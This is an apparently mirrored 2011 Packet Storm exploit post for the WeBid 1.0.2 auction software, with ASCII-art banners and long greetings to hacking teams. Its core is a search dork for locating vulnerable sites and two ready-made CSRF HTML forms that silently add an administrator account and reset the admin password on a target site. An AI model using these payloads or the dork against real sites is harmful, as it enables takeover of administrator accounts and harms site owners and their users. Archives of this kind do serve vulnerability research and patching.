Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:102419
HistoryJun 18, 2011 - 12:00 a.m.

WeBid 1.0.2 Cross Site Request Forgery

2011-06-1800:00:00
KedAns-Dz
packetstormsecurity.com
330
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : WeBid v1.0.2 Multiple Remote (CSRF) Vulnerabilities  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Multple CSRF ( Add New User & Change Admin PWD)  
# Tested on : [FreeBSD 8.2 (RELEASE)] & [Linux.(Ubuntu 10.10)] & [Windows XP SP3 (Fr)]  
##  
# +----+ xXx < Greetings to 'indoushka' at the Jail > xXx +----+  
##  
# Noting to all my friends and my Family : (my BAC 2011 is bosh) -> BAC 2012 I will be coming !  
# > Hredtha fe elMATH mo3amil 6 & fe lePHYSICs mo3almil 6 tani makan m4k4n pffff (x_x) ...  
# Sah kont CaVa em3a le Engineering Elicrtic m034mil 7 ! mes ma3andha ma t3aWedh 3la loKhrin3  
# +----------+ X==================== S x H x I x T ====================X +----------+  
###  
  
# (°) D0rk : "Powered by WeBid © " < 0r > 'inurl:"upldgallery.php"'  
  
# (+) Exploit & PoC :  
  
#===[ PoC (1) Add New User ]=======>  
  
<div>  
<h3> (CSRF) Add NeW User - ToolKit :</h3>  
<form name="conf" action="http://[target]/admin/newadminuser.php" method="post">  
<table>  
<input type="text" name="username" value="KedAns-Dz">  
<input type="password" name="password" value="">  
<input type="password" name="repeatpassword" value="">  
</table>  
<input type="hidden" name="action" value="update">  
<input type="submit" name="act" class="centre" value="Submit">  
</form>  
</div>  
  
#===[ PoC (2) Change Admin Password ]=======>  
  
<div>  
<h3> (CSRF) Change Admin Password - ToolKit :</h3>  
<form name="editadmin" action="http://[target]/admin/editadminuser.php?id=1" method="post">  
<table>  
<input type="password" name="password">  
<input type="password" name="repeatpassword">  
</table>  
<input type="hidden" name="action" value="update">  
<input type="hidden" name="id" value="1">  
<input type="submit" name="act" class="centre" value="Update">  
</form>  
</div>  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team & Liyan Oz (www.dis9.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
`
JSON